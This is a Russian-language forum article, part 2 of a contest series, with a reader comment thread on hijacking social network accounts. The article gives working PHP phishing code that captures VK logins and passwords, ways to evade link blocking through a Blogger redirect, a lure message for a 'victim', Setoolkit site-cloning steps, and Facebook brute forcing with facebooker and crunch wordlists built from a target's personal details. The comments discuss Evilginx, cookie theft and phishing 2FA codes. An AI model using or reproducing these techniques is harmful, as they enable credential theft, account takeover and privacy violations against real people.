Конкурс Получение доступа к аккаунту социальной сети. Ч 2

Статья для участия в конкурсе на codeby.

Приветствую вас дорогие друзья!
Сегодня мы продолжим изучать такую тему как "Получение доступа к аккаунту социальной сети". В прошлой части мы остановились на создании фишинга.

В этой части мы закончим создание нашего фишинг - сайта и приступим к разбору остальных тем которые более интересны.

Что же, а теперь создайте файл logs.php с таким содержимым:
PHP:
<?php
     $login = $_POST['email'];
     $pass = $_POST['pass'];
     $file = fopen("my_pass.txt", 'at');
     fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
     fclose($file);
     echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>

Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php
Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код
HTML:
<form method = 'GET' action = 'http://mysite/login.php'>
<label> Login:</label>
<input type = "text" name = "login" />
<label> Password:</label>
<input type = "password" name = "passwd" />
<input type = "button" />
</form>

То начало нашего скрипта logs.php выглядело бы так

PHP:
<?php
    $login = $_GET['login'];
    $pass = $_GET['passwd'];

.....

Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.
В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это

Screenshot from 2017-11-02 13-53-50.png

И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга

Screenshot from 2017-11-02 13-55-25.png

Практически всегда, если отправить пользователю чисто ссылку на фишинг то социальная сеть заблокирует ссылку. Есть много способов для обхода блокировки, но я для примера опишу вам лишь один.

1. Регистрируем аккаунт в blogger.com(не реклама) --> создаем свой блог.

2. Переходим к пункту Шаблон --> Изменить html.

3. Сократите ссылку на ваш фишинг. Далее добавим следующий код перед тегом <head>
HTML:
<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>

Теперь осталось сохранить.

В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же "жертве" из примера что-то такое:
Привет!
Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой
Держи <ССЫЛКА>

Setoolkit - фреймворк предназначенный для тестирования на проникновение и основанный на социальной инженерии.

На видео я выбрал следующие пункты
Код:
set> 1
set> 2
set:webattak> 3
set:webattak> 2

#Далее вводим имя вашего хоста
#И url сайта который будем клонировать

Остается только сократить ссылку на получившийся фишинг, дать ее "жертве" и мониторить то что выведет set.

Brute Force

Очень сильно уязвим к подбору пароля - facebook. Я создал аккаунт в facebook и оставил много информации. Сегодня мы опираясь на эту информацию попробуем составить базу паролей и применим один старый скрипт для проведения brute force.

Вот внешний вид профиля

Screenshot from 2017-11-02 14-06-14.png

Как я говорил ранее, будем записывать полученную информацию. Первое что бросается в глаза - это имя и фамилия. Смотрим далее и видим этот пост, сразу предполагая род деятельности

Screenshot from 2017-11-02 14-06-27.png

Просмотрев далее я нашел номер телефона пользователя. Проверив его на принадлежность к аккаунту начинаю брутить. Для этого понадобится скрипт facebooker

Распаковываем и далее пишем
Код:
chmod +x facebooker.pl
./facebooker <login> <wordlist>

Screenshot from 2017-11-02 14-14-07.png

Как видим на скрине, спустя некоторое время мы нашли пароль в простенькой базе.

После того как вы собрали информацию и поискав в топ базах не нашли пароля. То можно создать свою базу основываясь на собранной информации. Также в этом вам может помочь crunch. Создание своей базы может отнять уйму времени.

К примеру я создаю базу на пользователя имя которого Саня. Еще я предполагаю что Саня не такой умный и его пароль состоит из его имени и набора цифр. Тогда я получаю следующую команду
Код:
crunch 10 10 -t sanya.%%%% >> baza.txt
Эти 4 цифры могут быть какой-то определенной датой, как раз таки пройдемся по ним.
Повторяюсь, на создание своей базы можно убить очень много времени.

Помните в прошлой части я писал что при общении с "жертвой" мне удалось выудить много информации в числе которой был номер телефона?

Так вот давайте узнаем является ли этот номер логином данной страницы или нет.

Для примера снова вернусь к вконтакте. Переходим по "Забыли пароль"(мобильной версии). Пишем номер который удалось узнать и фамилию пользователя. Если пользователь с такими данными имеется, то ясно дело что номер который мы вводили ранее привязан к данной странице.

Screenshot from 2017-11-02 14-19-50.png

Значит что тот номер который я выудил привязан к странице данного пользователя.
А если не получилось, то постарайтесь узнать нет ли у данного пользователя фейка.
В следующей части закончим тему изучения этого способа.
А на этом часть 2 подошла к концу. До встречи в следующей части.

Вложения

• Screenshot from 2017-11-02 13-52-48.png
    Screenshot from 2017-11-02 13-52-48.png
    2,8 КБ · Просмотры: 635
  • Screenshot from 2017-11-02 14-06-14.png
    Screenshot from 2017-11-02 14-06-14.png
    78,5 КБ · Просмотры: 474
  • Screenshot from 2017-11-02 14-06-27.png
    Screenshot from 2017-11-02 14-06-27.png
    3,1 КБ · Просмотры: 479
  • Screenshot from 2017-11-02 14-14-07.png
    Screenshot from 2017-11-02 14-14-07.png
    23,5 КБ · Просмотры: 463
  • Screenshot from 2017-11-02 14-19-50.png
    Screenshot from 2017-11-02 14-19-50.png
    1,6 КБ · Просмотры: 438
  • Screenshot from 2017-11-02 13-53-50.png
    Screenshot from 2017-11-02 13-53-50.png
    65,6 КБ · Просмотры: 473
  • Screenshot from 2017-11-02 13-55-25.png
    Screenshot from 2017-11-02 13-55-25.png
    3,9 КБ · Просмотры: 514
Для фишинга есть хороший инструмент - Evilginx

1. не надо возиться с созданием фэйка
2. ворует пароли + куки
3. Обходит двухэтапную аутентификацию

Нужен домен + хостинг.
Во время атаки хотя и используется фишинговый домен, показывается реальная страница входа на сервис. Работает как прокси.

Для фишинга есть хороший инструмент - Evilginx

1. не надо возиться с созданием фэйка
2. ворует пароли + куки

Нужен домен + хостинг.
Во время атаки хотя и используется фишинговый домен, показывается реальная страница входа на сервис. Работает как прокси.

***Скрытый текст***

Как так то ?)

Как так то ?)

78tyn8!gert написал, что оно работает как прокси.
Мое предположение: Мы перехватываем лог/пароль, скрипт пытается войти на страницу, если там есть 2-ой фактор запрашиваем у жертвы посредством 2-ой фишинговой страницы код, который придет на ее телефон. Вводит код, считываем и попадаем в аккаунт. Жертву просто перенаправляем на уже офф сайт того ресурса, который клонировали.

интересует развитие событий после получения доступов в соц. профайлу.
вполне вероятно, что понадобиться авторизироваться, но.. в таком случае настоящему владельцу аккаунта приходит смс-оповещение о случившемся, что вызывает вопросы :[

• Нравится
Реакции: N1GHT_H3R0
интересует развитие событий после получения доступов в соц. профайлу.
вполне вероятно, что понадобиться авторизироваться, но.. в таком случае настоящему владельцу аккаунта приходит смс-оповещение о случившемся, что вызывает вопросы :[
Я ж сообщением выше отписал как это обойти
у жертвы создается иллюзия того, что он вошел в аккаунт, но не до конца и поэтому смс не вызывает никаких подозрений в большинстве случаев

Я ж сообщением выше отписал как это обойти
у жертвы создается иллюзия того, что он вошел в аккаунт, но не до конца и поэтому смс не вызывает никаких подозрений в большинстве случаев
каким образом запросить у жертвы код, после того как она посетила наш фишинговый сайт?)

каким образом запросить у жертвы код, после того как она посетила наш фишинговый сайт?)
Ну мы же уже внутри будем
никто не мешает просто добавить доверяемое устройство
ну там скользко довольно
все от ситуации и веб платформы зависит

Ну мы же уже внутри будем
никто не мешает просто добавить доверяемое устройство
ну там скользко довольно
все от ситуации и веб платформы зависит
я, определенно, чего-то не допонял.
когда мы будем внутри(в профайле на оригинальном вк), ей уже придет оповещение.
все приготовления должны быть сделаны заранее

Этим способом фишинговая страница получилась не особо правдоподобная. Высока вероятность того, что жертва что-то заподозрит. Так же, пользователь может просто ввести неправильные данные и они в твоем случае никак не проверяются, если я все правильно понимаю. Мне периодически приходят такие ссылки, на которых для начала можно ввести логин huisosi и пароль guboitryasi и потом уже начинать dbrute =)
Думаю, проще взять готовое решение с проверкой валидности, коих на томже ютубе лежит валом и их уже заливать на хостинг.
Когда сам задавался подобным вопросом, то создавал блог в сервисе гугл, на нем настраивал редирект на свой фишинг. Это не выглядит подозрительно (у сокращателей ссылок не самая лучшая репутация), да еще и vk сам в сообщении подтянет красивую картинку под ссылку, которую ты отправишь жертве (картинку в блоге вставляешь сам по своему усмотрению). Так же, предусматривал автопереключение на мобильную версию сайта, чтоб повысить вероятность профита. Большинство пользователей сидят с мобильного.

Да, го статейку по Evilginx, кто в нем уже разобрался
Вроде функционал шикарен

• Нравится
Реакции: <~DarkNode~>
Да, го статейку по Evilginx, кто в нем уже разобрался
Вроде функционал шикарен
Давай тож включайся)) уверен у тебя так же есть стопочка годного материала)
Для чего активничать ?
Все просто - что бы тебя увидели и позвали в тим с закрытым разделом)
Пока форум молодой - у истоков всегда проще двигаться вверх)

• Нравится
Реакции: Artem.ser и 78tyn8!gert
яро(!) плюсую в поддержку написания какого-нибудь справочника/мана/ликбеза по evilginx'y или, мне было бы полезно, общим поверхностным моментам, которые могут дать толчки в этом направлении.
всегда была интересна кибербезопасность и её другая сторона :]

• Нравится
Реакции: vag4b0nd
яро(!) плюсую в поддержку написания какого-нибудь справочника/мана/ликбеза по evilginx'y или, мне было бы полезно, общим поверхностным моментам, которые могут дать толчки в этом направлении.
всегда была интересна кибербезопасность и её другая сторона :]
Как приятно знать , что на кодеби много пользователей желают внести свой вклад в развитие форума)

• Нравится
Реакции: Artem.ser
Давай тож включайся)) уверен у тебя так же есть стопочка годного материала)
Для чего активничать ?
Все просто - что бы тебя увидели и позвали в тим с закрытым разделом)
Пока форум молодой - у истоков всегда проще двигаться вверх)
Хм, подумаю над статейкой
Но пока (как я думаю) у меня слишком мало знаний именно практических, только теория
Может как-то позже, но от командной работы не откажусь, как никак будет наконец адекватная практика

Хм, подумаю над статейкой
Но пока (как я думаю) у меня слишком мало знаний именно практических, только теория

как никак будет наконец адекватная практика

Без практики теория мертва, без теории практика слепа.
Слышал когда-нибудь?

• Нравится
Реакции: Dr.Lafa
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!